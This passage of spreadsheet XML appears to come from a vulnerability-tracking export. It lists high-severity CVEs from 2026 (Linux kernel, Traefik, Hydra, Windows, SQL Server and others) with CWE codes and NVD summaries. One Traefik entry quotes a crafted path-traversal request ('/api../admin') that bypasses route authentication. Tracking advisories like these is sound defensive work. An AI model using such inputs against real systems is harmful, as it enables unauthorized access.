      <c r="B2106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64381</t>
        </is>
      </c>
      <c r="C2106" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2106" s="5" t="inlineStr"/>
      <c r="F2106" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2106" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2106" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2106" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J2106" s="5" t="inlineStr"/>
      <c r="K2106" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2106" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: Fix next buffer leak in receive_encrypted_standard()
receive_encrypted_standard() allocates next_buffer before checking
whether the number of compound PDUs already reached MAX_COMPOUND. If
the limit check fails, the function returns immediately and the newly
allocated next_buffer is not assigned to server-&gt;smallbuf/server-&gt;bigbuf,
making it leaked.
Move the MAX_COMPOUND check before allocating next_buffer.</t>
        </is>
      </c>
      <c r="M2106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64381</t>
        </is>
      </c>
    </row>
    <row r="2107">
      <c r="A2107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67309</t>
        </is>
      </c>
      <c r="C2107" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2107" s="5" t="inlineStr"/>
      <c r="F2107" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2107" s="5" t="inlineStr">
        <is>
          <t>nginx, kubernetes</t>
        </is>
      </c>
      <c r="H2107" s="5" t="inlineStr"/>
      <c r="I2107" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J2107" s="5" t="inlineStr"/>
      <c r="K2107" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2107" s="5" t="inlineStr">
        <is>
          <t>Traefik versions &gt;= v3.7.0 and &lt;= v3.7.7 contain a path traversal vulnerability in the Kubernetes Ingress NGINX provider's RewriteTarget middleware (generated from the nginx.ingress.kubernetes.io/rewrite-target annotation). When an Ingress path uses a regex that captures attacker-controlled text without requiring a path separator (e.g., path /api(.*) with rewrite target /$1), a crafted request such as /api../admin matches the public router, is rewritten to a dot-segment traversal path (/../admin), and is forwarded without post-replacement normalization validation. A backend that normalizes dot segments resolves the path to a protected endpoint (e.g., /admin) reachable only through a separate router secured with BasicAuth, DigestAuth, or ForwardAuth, resulting in route-level authentication bypass. The issue is fixed in v3.7.8.</t>
        </is>
      </c>
      <c r="M2107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67309</t>
        </is>
      </c>
    </row>
    <row r="2108">
      <c r="A2108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67846</t>
        </is>
      </c>
      <c r="C2108" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2108" s="5" t="inlineStr"/>
      <c r="F2108" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2108" s="5" t="inlineStr"/>
      <c r="H2108" s="5" t="inlineStr"/>
      <c r="I2108" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2108" s="5" t="inlineStr"/>
      <c r="K2108" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="L2108" s="5" t="inlineStr">
        <is>
          <t>Berkeley Out-of-Order Machine (BOOM) commit 5223e44cfeb26f41380057a2eb4d651197475f69 contains a potential incorrect privilege assignment issue in the v3 and v4 NBDTLB implementations. The raw mstatus.SUM value participates in the read and write permission logic without an explicit local satp.MODE validity check at the use site</t>
        </is>
      </c>
      <c r="M2108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67846</t>
        </is>
      </c>
    </row>
    <row r="2109">
      <c r="A2109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67961</t>
        </is>
      </c>
      <c r="C2109" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2109" s="5" t="inlineStr"/>
      <c r="F2109" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2109" s="5" t="inlineStr"/>
      <c r="H2109" s="5" t="inlineStr"/>
      <c r="I2109" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J2109" s="5" t="inlineStr"/>
      <c r="K2109" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L2109" s="5" t="inlineStr">
        <is>
          <t>An issue in O2OA v.10.0.2 allows a local attacker to execute arbitrary code via the the sandbox mechanism of the Invoke script execution.</t>
        </is>
      </c>
      <c r="M2109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67961</t>
        </is>
      </c>
    </row>
    <row r="2110">
      <c r="A2110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68508</t>
        </is>
      </c>
      <c r="C2110" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2110" s="5" t="inlineStr"/>
      <c r="F2110" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2110" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2110" s="5" t="inlineStr"/>
      <c r="I2110" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2110" s="5" t="inlineStr"/>
      <c r="K2110" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-94</t>
        </is>
      </c>
      <c r="L2110" s="5" t="inlineStr">
        <is>
          <t>Hydra is a framework for elegantly configuring complex applications. Prior to 1.3.4, hydra.utils.instantiate() resolves and calls Python objects selected by configuration through _resolve_target() in hydra/_internal/instantiate/_instantiate2.py, allowing attacker-controlled target values and arguments to choose dangerous callables. A consuming application, library, CLI workflow, or model loader that passes untrusted configuration, CLI overrides, or model metadata into hydra.utils.instantiate() can therefore execute arbitrary code in its own process, including reading or modifying files and credentials or terminating the process. Version 1.3.4 adds target blocking with an explicit HYDRA_INSTANTIATE_ALLOWLIST_OVERRIDE escape hatch. This issue is fixed in version 1.3.4.</t>
        </is>
      </c>
      <c r="M2110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68508</t>
        </is>
      </c>
    </row>
    <row r="2111">
      <c r="A2111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68787</t>
        </is>
      </c>
      <c r="C2111" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2111" s="5" t="inlineStr"/>
      <c r="F2111" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2111" s="5" t="inlineStr"/>
      <c r="H2111" s="5" t="inlineStr"/>
      <c r="I2111" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2111" s="5" t="inlineStr"/>
      <c r="K2111" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2111" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68787</t>
        </is>
      </c>
    </row>
    <row r="2112">
      <c r="A2112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68832</t>
        </is>
      </c>
      <c r="C2112" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2112" s="5" t="inlineStr"/>
      <c r="F2112" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2112" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2112" s="5" t="inlineStr"/>
      <c r="I2112" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2112" s="5" t="inlineStr"/>
      <c r="K2112" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2112" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68832</t>
        </is>
      </c>
    </row>
    <row r="2113">
      <c r="A2113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68841</t>
        </is>
      </c>
      <c r="C2113" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2113" s="5" t="inlineStr"/>
      <c r="F2113" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2113" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2113" s="5" t="inlineStr"/>
      <c r="I2113" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2113" s="5" t="inlineStr"/>
      <c r="K2113" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2113" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M2113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68841</t>
        </is>
      </c>
    </row>
    <row r="2114">
      <c r="A2114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68844</t>
        </is>
      </c>
      <c r="C2114" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2114" s="5" t="inlineStr"/>
      <c r="F2114" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2114" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2114" s="5" t="inlineStr"/>
      <c r="I2114" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2114" s="5" t="inlineStr"/>
      <c r="K2114" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2114" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68844</t>
        </is>
      </c>
    </row>
    <row r="2115">
      <c r="A2115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68845</t>
        </is>
      </c>
      <c r="C2115" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2115" s="5" t="inlineStr"/>
      <c r="F2115" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2115" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2115" s="5" t="inlineStr"/>
      <c r="I2115" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2115" s="5" t="inlineStr"/>
      <c r="K2115" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2115" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68845</t>
        </is>
      </c>
    </row>
    <row r="2116">
      <c r="A2116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68848</t>
        </is>
      </c>
      <c r="C2116" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2116" s="5" t="inlineStr"/>
      <c r="F2116" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2116" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2116" s="5" t="inlineStr"/>
      <c r="I2116" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2116" s="5" t="inlineStr"/>
      <c r="K2116" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2116" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68848</t>
        </is>
      </c>
    </row>
    <row r="2117">
      <c r="A2117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68850</t>
        </is>
      </c>
      <c r="C2117" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2117" s="5" t="inlineStr"/>
      <c r="F2117" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2117" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2117" s="5" t="inlineStr"/>
      <c r="I2117" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2117" s="5" t="inlineStr"/>
      <c r="K2117" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2117" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Account allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68850</t>
        </is>
      </c>
    </row>
    <row r="2118">
      <c r="A2118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68875</t>
        </is>
      </c>
      <c r="C2118" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2118" s="5" t="inlineStr"/>
      <c r="F2118" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2118" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2118" s="5" t="inlineStr"/>
      <c r="I2118" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2118" s="5" t="inlineStr"/>
      <c r="K2118" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L2118" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows NTFS allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68875</t>
        </is>
      </c>
    </row>
    <row r="2119">
      <c r="A2119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68877</t>
        </is>
      </c>
      <c r="C2119" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2119" s="5" t="inlineStr"/>
      <c r="F2119" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2119" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2119" s="5" t="inlineStr"/>
      <c r="I2119" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2119" s="5" t="inlineStr"/>
      <c r="K2119" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2119" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68877</t>
        </is>
      </c>
    </row>
    <row r="2120">
      <c r="A2120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68885</t>
        </is>
      </c>
      <c r="C2120" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2120" s="5" t="inlineStr"/>
      <c r="F2120" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2120" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2120" s="5" t="inlineStr"/>
      <c r="I2120" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2120" s="5" t="inlineStr"/>
      <c r="K2120" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2120" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68885</t>
        </is>
      </c>
    </row>
    <row r="2121">
      <c r="A2121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68888</t>
        </is>
      </c>
      <c r="C2121" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2121" s="5" t="inlineStr"/>
      <c r="F2121" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2121" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2121" s="5" t="inlineStr"/>
      <c r="I2121" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2121" s="5" t="inlineStr"/>
      <c r="K2121" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2121" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68888</t>
        </is>
      </c>
    </row>
    <row r="2122">
      <c r="A2122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68890</t>
        </is>
      </c>
      <c r="C2122" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2122" s="5" t="inlineStr"/>
      <c r="F2122" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2122" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2122" s="5" t="inlineStr"/>
      <c r="I2122" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2122" s="5" t="inlineStr"/>
      <c r="K2122" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2122" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68890</t>
        </is>
      </c>
    </row>
    <row r="2123">
      <c r="A2123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68892</t>
        </is>
      </c>
      <c r="C2123" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2123" s="5" t="inlineStr"/>
      <c r="F2123" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2123" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2123" s="5" t="inlineStr"/>
      <c r="I2123" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2123" s="5" t="inlineStr"/>
      <c r="K2123" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2123" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68892</t>
        </is>
      </c>
    </row>
    <row r="2124">
      <c r="A2124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68896</t>
        </is>
      </c>
      <c r="C2124" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2124" s="5" t="inlineStr"/>
      <c r="F2124" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2124" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2124" s="5" t="inlineStr"/>
      <c r="I2124" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2124" s="5" t="inlineStr"/>
      <c r="K2124" s="5" t="inlineStr">
        <is>
          <t>CWE-36</t>
        </is>
      </c>
      <c r="L2124" s="5" t="inlineStr">
        <is>
          <t>Absolute path traversal in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68896</t>
        </is>
      </c>
    </row>
    <row r="2125">
      <c r="A2125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69265</t>
        </is>
      </c>
      <c r="C2125" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2125" s="5" t="inlineStr"/>
      <c r="F2125" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2125" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2125" s="5" t="inlineStr"/>
      <c r="I2125" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2125" s="5" t="inlineStr"/>
      <c r="K2125" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2125" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69265</t>
        </is>
      </c>
    </row>
    <row r="2126">
      <c r="A2126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69269</t>
        </is>
      </c>
      <c r="C2126" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2126" s="5" t="inlineStr"/>
      <c r="F2126" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2126" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2126" s="5" t="inlineStr"/>
      <c r="I2126" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2126" s="5" t="inlineStr"/>
      <c r="K2126" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L2126" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69269</t>
        </is>
      </c>
    </row>
    <row r="2127">
      <c r="A2127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69270</t>
        </is>
      </c>
      <c r="C2127" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2127" s="5" t="inlineStr"/>
      <c r="F2127" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2127" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2127" s="5" t="inlineStr"/>
      <c r="I2127" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2127" s="5" t="inlineStr"/>
      <c r="K2127" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L2127" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69270</t>
        </is>
      </c>
    </row>
    <row r="2128">
      <c r="A2128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69277</t>
        </is>
      </c>
      <c r="C2128" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2128" s="5" t="inlineStr"/>
      <c r="F2128" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2128" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2128" s="5" t="inlineStr"/>
      <c r="I2128" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2128" s="5" t="inlineStr"/>
      <c r="K2128" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2128" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69277</t>
        </is>
      </c>
    </row>
    <row r="2129">
      <c r="A2129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69283</t>
        </is>
      </c>
      <c r="C2129" s="5" t="n">
        <v>7.8</v>
      </c>
